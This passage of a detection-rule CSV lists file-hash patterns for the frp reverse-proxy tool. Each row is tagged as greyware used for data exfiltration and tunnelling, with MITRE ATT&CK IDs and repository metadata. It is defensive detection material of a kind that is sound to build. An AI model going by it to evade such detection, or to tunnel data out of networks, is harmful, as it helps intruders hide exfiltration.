Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*718c0f0820f65782bc19af479f2406c9654fc564b9999a0936581b4ed1d91bb2*",".{0,1000}718c0f0820f65782bc19af479f2406c9654fc564b9999a0936581b4ed1d91bb2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*71a0f3137f02da4116ea2b7d134c38be86a1229cffb0b1dac4469b561ea35985*",".{0,1000}71a0f3137f02da4116ea2b7d134c38be86a1229cffb0b1dac4469b561ea35985.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*722d7c6b976d85f29acd429f1fd6289a6e8451a3e1815444404bd4b99eb553f7*",".{0,1000}722d7c6b976d85f29acd429f1fd6289a6e8451a3e1815444404bd4b99eb553f7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*72c007c9121974c0812eb2f98e26f987be28774b3175325d45596a555bfb811a*",".{0,1000}72c007c9121974c0812eb2f98e26f987be28774b3175325d45596a555bfb811a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*73f3e7037e5f06e8f6fc30aa47aabbc815b4173decdcab149c647126a4aa6370*",".{0,1000}73f3e7037e5f06e8f6fc30aa47aabbc815b4173decdcab149c647126a4aa6370.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7402fc76816fd653bbe050a3f8a2dfd7c1363c980e2cc3dc369c60c3f0d502a7*",".{0,1000}7402fc76816fd653bbe050a3f8a2dfd7c1363c980e2cc3dc369c60c3f0d502a7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*74df509decd6953a77543ae8febcdc05379bb2bd0614ad2fe53a4a6cfac86caf*",".{0,1000}74df509decd6953a77543ae8febcdc05379bb2bd0614ad2fe53a4a6cfac86caf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*754d66a918d3550c83e670a458f66954eec0521d6e76a20dd0a865992ad1b55e*",".{0,1000}754d66a918d3550c83e670a458f66954eec0521d6e76a20dd0a865992ad1b55e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*76c7a4f5e35f32b726c48fdd32e292f63c7b374ba019a28dc44b04140f03e6de*",".{0,1000}76c7a4f5e35f32b726c48fdd32e292f63c7b374ba019a28dc44b04140f03e6de.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*76d2a7bc7ceb5f542ed5be5208f68253261a36d1f4206fc4689296d9033a59a2*",".{0,1000}76d2a7bc7ceb5f542ed5be5208f68253261a36d1f4206fc4689296d9033a59a2.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*76e5d42d4d2971de51de652417cfe38461ef9e18672e1070a1138910c8448a2f*",".{0,1000}76e5d42d4d2971de51de652417cfe38461ef9e18672e1070a1138910c8448a2f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*786985d9671f485f045b1039b98d312e5d97c85b38b116f5087e5c95d831e455*",".{0,1000}786985d9671f485f045b1039b98d312e5d97c85b38b116f5087e5c95d831e455.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7946d13b2498410bf9fb0cc32fee7ea44bde8be438eb1b1bc67c440a3671589d*",".{0,1000}7946d13b2498410bf9fb0cc32fee7ea44bde8be438eb1b1bc67c440a3671589d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*795defca4853f7cded6625d792eae33b45987856b961a82c8b6cc44a8d0b3bc7*",".{0,1000}795defca4853f7cded6625d792eae33b45987856b961a82c8b6cc44a8d0b3bc7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*7a9fd341e0deb467ba0ab4913852adc965a0df2ba38e18ec80ab7ef61a9e99e8*",".{0,1000}7a9fd341e0deb467ba0ab4913852adc965a0df2ba38e18ec80ab7ef61a9e99e8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7b6c9cf91ad9d00385d47139ffc69c0c9d72270886dbdb4f71f599efaec2cb64*",".{0,1000}7b6c9cf91ad9d00385d47139ffc69c0c9d72270886dbdb4f71f599efaec2cb64.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7bb651eec86e0126af3bd515235901a64b5490115defa10972e703c05bc65345*",".{0,1000}7bb651eec86e0126af3bd515235901a64b5490115defa10972e703c05bc65345.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7c1416256f7f3637e0dfed99988d08282ae0866784f1eecd53a3639e1a942867*",".{0,1000}7c1416256f7f3637e0dfed99988d08282ae0866784f1eecd53a3639e1a942867.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*7c55322bb55e4085ab950711f0c3406a25f95573f618ed347e8f542ecf93cb78*",".{0,1000}7c55322bb55e4085ab950711f0c3406a25f95573f618ed347e8f542ecf93cb78.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7c6208a3f7131802f24ad7bf7f02c760bba5c17443bdf328598d0758865f80df*",".{0,1000}7c6208a3f7131802f24ad7bf7f02c760bba5c17443bdf328598d0758865f80df.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7d299b5695b0076b24e93928bad255f76c8352b5002fd459ef63c0199251abe9*",".{0,1000}7d299b5695b0076b24e93928bad255f76c8352b5002fd459ef63c0199251abe9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7dba4f6e942502f0eca2ec37206671734eeb87c40a29f16b96ce14045da9e833*",".{0,1000}7dba4f6e942502f0eca2ec37206671734eeb87c40a29f16b96ce14045da9e833.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*7ebff99259931e26c3baf8dd78c1af671d73a6c91a1d6ec9107c0c225df76bf0*",".{0,1000}7ebff99259931e26c3baf8dd78c1af671d73a6c91a1d6ec9107c0c225df76bf0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7fac327360b72613dec67583e4b939b65af0b88b676660821647b161ec2173fd*",".{0,1000}7fac327360b72613dec67583e4b939b65af0b88b676660821647b161ec2173fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*7ff954d3f9f0d655be5f250ca50e8b065ddb8b4d3a1da0a55f740cc03301c6f5*",".{0,1000}7ff954d3f9f0d655be5f250ca50e8b065ddb8b4d3a1da0a55f740cc03301c6f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*801a1ea2bf02b9ff657c34708918397bec61408bed216f6ed45889973ee09a01*",".{0,1000}801a1ea2bf02b9ff657c34708918397bec61408bed216f6ed45889973ee09a01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*80228ba9bd43db42713f682032c0d4c2faa07ecb01be848bb57f6d51f24fa138*",".{0,1000}80228ba9bd43db42713f682032c0d4c2faa07ecb01be848bb57f6d51f24fa138.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8141072eb367f6cc492bbcec66c0f08351398ba1a5b44e9f0a831b382ef866cd*",".{0,1000}8141072eb367f6cc492bbcec66c0f08351398ba1a5b44e9f0a831b382ef866cd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*81930048c93d8db07af024cd0355809248501dec0ce182a734d16e6bd48055a3*",".{0,1000}81930048c93d8db07af024cd0355809248501dec0ce182a734d16e6bd48055a3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8355cecbe4792077c4977def67d9d10be79d0c9442aec7dc93cbdf9523387844*",".{0,1000}8355cecbe4792077c4977def67d9d10be79d0c9442aec7dc93cbdf9523387844.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*85cd761d170a2b9d567dcf7bd8c1a4aefa19aa9cfca048edd29483a196b42dcb*",".{0,1000}85cd761d170a2b9d567dcf7bd8c1a4aefa19aa9cfca048edd29483a196b42dcb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8805d70a692b0c5e20271214af085ffc3d8ea2176ce5dbe06fd6e4de59d8206f*",".{0,1000}8805d70a692b0c5e20271214af085ffc3d8ea2176ce5dbe06fd6e4de59d8206f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*886ac7c8c0e01bddcb808947f76a5f904572e337fa4023cce4bad71a7ae9ca1c*",".{0,1000}886ac7c8c0e01bddcb808947f76a5f904572e337fa4023cce4bad71a7ae9ca1c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*895b5c7ece8b458dff80ed790fc1633675a05fc9c4bd994ac89cf8e9d83bd32b*",".{0,1000}895b5c7ece8b458dff80ed790fc1633675a05fc9c4bd994ac89cf8e9d83bd32b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*8a0f1ef0b8723089613e2754d965ac9059eed027064bdd484f417fa6f5756d12*",".{0,1000}8a0f1ef0b8723089613e2754d965ac9059eed027064bdd484f417fa6f5756d12.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8a222ae6ff9a59164b44aac7d3005e4d75bd97997c48a51e05b5d50dbe6983af*",".{0,1000}8a222ae6ff9a59164b44aac7d3005e4d75bd97997c48a51e05b5d50dbe6983af.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8a5b86e7ea67bd1355ca5b9ddda60ecfdfb7c0b13cf06af71c1e72e88371016d*",".{0,1000}8a5b86e7ea67bd1355ca5b9ddda60ecfdfb7c0b13cf06af71c1e72e88371016d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8ad8905b9296f3c26632f3bfc66302bc082b62295f6bbbb5b78e31d1e6649f26*",".{0,1000}8ad8905b9296f3c26632f3bfc66302bc082b62295f6bbbb5b78e31d1e6649f26.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*8b0067e658dcbb21313ae8192aa7e1d364af8e96aeb7893ba7422ea0844e8bd5*",".{0,1000}8b0067e658dcbb21313ae8192aa7e1d364af8e96aeb7893ba7422ea0844e8bd5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8b2aee9d9eabc6078ae8a4c718030be85a13464becdb99f97f635e75425eb63e*",".{0,1000}8b2aee9d9eabc6078ae8a4c718030be85a13464becdb99f97f635e75425eb63e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8c47d8f1ad960d0f0459bd0fae7bc33c9266943d04549145b969c9107c59703f*",".{0,1000}8c47d8f1ad960d0f0459bd0fae7bc33c9266943d04549145b969c9107c59703f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*8e05baa844d928b6239bd9f43cd3e065fc2af971930bc6344e2c899d7eea14db*",".{0,1000}8e05baa844d928b6239bd9f43cd3e065fc2af971930bc6344e2c899d7eea14db.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*8ecf30ac7c14f85da20c1761c6418979282bff12db4d82ade2f4a1a8037bdf6e*",".{0,1000}8ecf30ac7c14f85da20c1761c6418979282bff12db4d82ade2f4a1a8037bdf6e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9033c6def481bde4bf7f2361966ae0ea92dfda5763a167460dcf0e231a2d02b8*",".{0,1000}9033c6def481bde4bf7f2361966ae0ea92dfda5763a167460dcf0e231a2d02b8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*91b1b306c1a538dd6d60857a1da9019241034bcaf0cc19e0c07abfaa8f6a8f75*",".{0,1000}91b1b306c1a538dd6d60857a1da9019241034bcaf0cc19e0c07abfaa8f6a8f75.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*91f46654fd8eae9fcc5a7189c6629a7e4b8f49654d996bbb45432cb4a46ac8f7*",".{0,1000}91f46654fd8eae9fcc5a7189c6629a7e4b8f49654d996bbb45432cb4a46ac8f7.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*9299c297f6c75c6aa2bbbb5de27172e367328b6f5bbb6f8d1c4ca73c4c4af415*",".{0,1000}9299c297f6c75c6aa2bbbb5de27172e367328b6f5bbb6f8d1c4ca73c4c4af415.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*93afeb34c835796508383b70028216eb3d43b2bf63bb3f7493acd1ec533d588e*",".{0,1000}93afeb34c835796508383b70028216eb3d43b2bf63bb3f7493acd1ec533d588e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*94169b8d725d30bb0ddf19db73d18b99544dcc52521507419eb7fb42823ea8ac*",".{0,1000}94169b8d725d30bb0ddf19db73d18b99544dcc52521507419eb7fb42823ea8ac.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*94ac6a42a165d913b79a0dcfb2d55a686e81b776697580e113aecd8815607076*",".{0,1000}94ac6a42a165d913b79a0dcfb2d55a686e81b776697580e113aecd8815607076.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*94e608af6d6f96619de403bf3aed4db8ab602999e0335380279e0d8aca1c6040*",".{0,1000}94e608af6d6f96619de403bf3aed4db8ab602999e0335380279e0d8aca1c6040.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*954903a1202b2a256a526839733dd2c3e676b58e68817aec11fd60743dab57ee*",".{0,1000}954903a1202b2a256a526839733dd2c3e676b58e68817aec11fd60743dab57ee.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*95583f7a979910ff4e65a5d9802df699063472a67a1f9e6d6fd6c2fcff448a14*",".{0,1000}95583f7a979910ff4e65a5d9802df699063472a67a1f9e6d6fd6c2fcff448a14.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*95c0695cdf0cd8d399cabdccdff93b25aa7deb97e950bd3702bbbaf9a2baf87a*",".{0,1000}95c0695cdf0cd8d399cabdccdff93b25aa7deb97e950bd3702bbbaf9a2baf87a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" 
"*95f0d8c8f4781fc8e42b7d644024c647032e3f6cd0ffe425e8f7d5a46d601557*",".{0,1000}95f0d8c8f4781fc8e42b7d644024c647032e3f6cd0ffe425e8f7d5a46d601557.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9704b24b5a58144293f7c7715b095b1ebf43b90e501050dfb9477094e6dca41b*",".{0,1000}9704b24b5a58144293f7c7715b095b1ebf43b90e501050dfb9477094e6dca41b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*9774490a0a4f822960a8da99a214cec6e2320622c2c20cd6b713e0e52806031c*",".{0,1000}9774490a0a4f822960a8da99a214cec6e2320622c2c20cd6b713e0e52806031c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z" "*97b4d3555734cba2af59b72b960ce10891b584dcf8d9e3db9f4f099c0a64131d*",".{0,1000}97b4d3555734cba2af59b72b960ce10891b584dcf8d9e3db9f4f099c0a64131d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - 